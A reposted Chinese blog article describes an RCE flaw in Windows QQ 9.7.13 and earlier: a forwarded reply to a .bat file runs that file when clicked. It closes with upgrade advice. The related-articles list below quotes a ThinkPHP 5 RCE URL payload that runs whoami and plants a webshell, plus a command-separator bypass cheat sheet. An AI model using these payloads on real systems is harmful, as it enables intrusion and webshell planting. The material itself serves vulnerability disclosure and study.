QQ9.7.13版本及以下RCE漏洞

这篇具有很好参考价值的文章主要介绍了QQ9.7.13版本及以下RCE漏洞。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

00、声明:

本文仅仅作为学习漏洞原理,为了更好的防范利用漏洞进行的攻击行为,请勿将文章内的相关技术用于非法目的,如有相关非法行为与文章作者无关。请遵守《中华人民共和国网络安全法》

01、漏洞环境

攻击方和受害方双方均为windowsQQ9.7.13版本及以下

复现时间:2023.8.21 14:30

QQ9.7.13版本及以下RCE漏洞

02、复现过程

攻击方先建立个bat文件或者exe文件,我们这里实现弹出计算机的功能进行测试即可

QQ9.7.13版本及以下RCE漏洞

QQ9.7.13版本及以下RCE漏洞

然后进攻方将这个1.bat发送给自己或者小号群,然后回复

QQ9.7.13版本及以下RCE漏洞

然后将这个回复的记录进行转发,当受害方点击这个回复记录的文件名称时,会自动下载并运行程序

然后被360拦了...

虽然是这个bat内容层面只有一个计算器,但是依旧是被拦掉了,推测应该是因为360的防护规则是网络下载的bat文件全部报毒

QQ9.7.13版本及以下RCE漏洞

QQ9.7.13版本及以下RCE漏洞

到这一步也没有啥继续测试的必要了,因为已经可以明显的看见已经有bat执行的告警了

03、防范建议

不要用电脑qq点看起来不清不楚的文件回复记录,当然也不要点击未知的链接,不要下载陌生人发送的未知文件

抓紧升级windowsQQ版本,升级为最新版或者官方发布的经典版最新版9.7.15版本

手机qq、windowsQQ9.7.13以上版本,linuxQQ,macQQ不受影响文章来源地址https://www.toymoban.com/news/detail-663965.html

到了这里,关于QQ9.7.13版本及以下RCE漏洞的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • uniapp打包微信小程序。报错:https://api.weixin.qq.com 不在以下 request 合法域名列表

    场景:在进行打包上传测试时,发现登录失效,但在测试中【勾选不效应合法域名】就可以。 出现原因:我在获取到用户code后,直接使用调用官方接口换取openid 解决方案: 可以把code带给后端,让他们返回token值

    2024年02月09日
    浏览(52)
  • thinkphp 5-rce(rce漏洞getshell)

     vulhub靶场 http://xxxxx:8080/?s=/Index/thinkapp/invokefunctionfunction=call_user_func_arrayvars[0]=systemvars[1][]=whoami  验证漏洞 linux系统,可以用touch命令创建文件 http://xxxxx:8080/?s=/Index/thinkapp/invokefunctionfunction=call_user_func_arrayvars[0]=systemvars[1][]= touch mm.php 再用echo写入一句话 http://xxxxx:8080/index.

    2024年02月14日
    浏览(40)
  • phpstudy 最新 RCE漏洞

    突然看到这个漏洞,所以起来复现一下,其实没有什么技巧和经验可言,就是一个xss+csrf的RCE。 本文仅供参考,请勿用于非法用途 环境部署可以参考:https://www.xp.cn/linux.html#install-show 我是直接用kali部署的,相当于是unbantu。 先来看xss,正常的登录测试 scriptalert(1)/script 因为在

    2024年02月05日
    浏览(31)
  • RCE漏洞简介

    今天继续给大家介绍渗透测试相关知识,本文主要内容是RCE漏洞简介。 免责声明: 本文所介绍的内容仅做学习交流使用,严禁利用文中技术进行非法行为,否则造成一切严重后果自负! 再次强调:严禁对未授权设备进行渗透测试! 所谓RCE漏洞,即Remote Code/Command Execution,远

    2024年02月13日
    浏览(57)
  • rce 漏洞

    过滤分隔符 ; 1,可以使用%0a代替,%0a其实在某种程度上是最标准的命令链接符号 功能 符号 payload 换行符 %0a ?cmd=123%0als 回车符 %0d ?cmd=123%0dls 连续指令 ; ?1=123;pwd 后台进程 ?1=123pwd 管道 | ?1=123|pwd 逻辑运算 ||或 ?1=123pwd ;    //分号 |    //把前面输出的当作后面的输入 (管道符

    2024年02月07日
    浏览(41)
  • Spring RCE漏洞

    目录 Spring RCE漏洞 一、漏洞概况与影响 二、Spring动态参数绑定 三、漏洞复现 四、漏洞原理 五、漏洞排查和修复 CVE编号:CVE-2022-22965 受影响范围: Spring Framework 5.3.X 5.3.18 Spring Framework 5.2.X 5.2.20 JDK =9 使用Tomcat中间件且开启了Tomcat日志记录的应用系统 将HTTP请求中的的请求参数

    2024年02月01日
    浏览(36)
  • RCE(远程命令执行)漏洞详解

    RCE(remote command/code execute,远程命令执行)漏洞 远程代码执行 (RCE) 攻击是指攻击者可以在一个组织的计算机或网络上运行恶意代码。执行攻击者控制的代码的能力可用于各种目的,包括部署额外的恶意软件或窃取敏感数据。 远程代码执行攻击通常通过网络应用程序和网络基础

    2024年04月10日
    浏览(48)
  • RCE 远程代码执行漏洞分析

    Remote Command/Code Execute 远程命令执行/远程代码执行漏洞 这种漏洞通常出现在应用程序或操作系统中,攻击者可以通过利用漏洞注入恶意代码,并在受攻击的系统上执行任意命令。 PHP 代码执行 PHP 代码注入 OS 命令执行 OS 命令注入 Java、Python…… Web 应用程序 远程服务 操作系统

    2024年02月08日
    浏览(38)
  • RCE远程命令执行漏洞挖掘思路

    1.URL上 在 url参数上 ,不仅仅可能存在ssrf漏洞,也有很大概率存在命令执行,很大可能调用系统命令如curl。 payload例子: index.php?id=2;}phpinfo();/* ttp://www.xxx.com/cmd.php?cmd=phpinfo() 比如访问到如下URL,在jsp后面尝试加参数,比如path(什么参数需要试)     http://x.x.x.x:28076/file/dirF

    2024年02月01日
    浏览(55)
  • Apache ActiveMQ RCE漏洞复现

    1、 产品简介 ActiveMQ是一种开源的基于JMS(Java Message Servie)规范的一种消息中间件的实现,ActiveMQ的设计目标是提供标准的,面向消息的,能够跨越多语言和多系统的应用集成消息通信中间件。ActiveMQ是Apache出品,最流行的,能力强劲的开源消息总线。 2、 漏洞概述 Apache Act

    2024年01月22日
    浏览(39)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包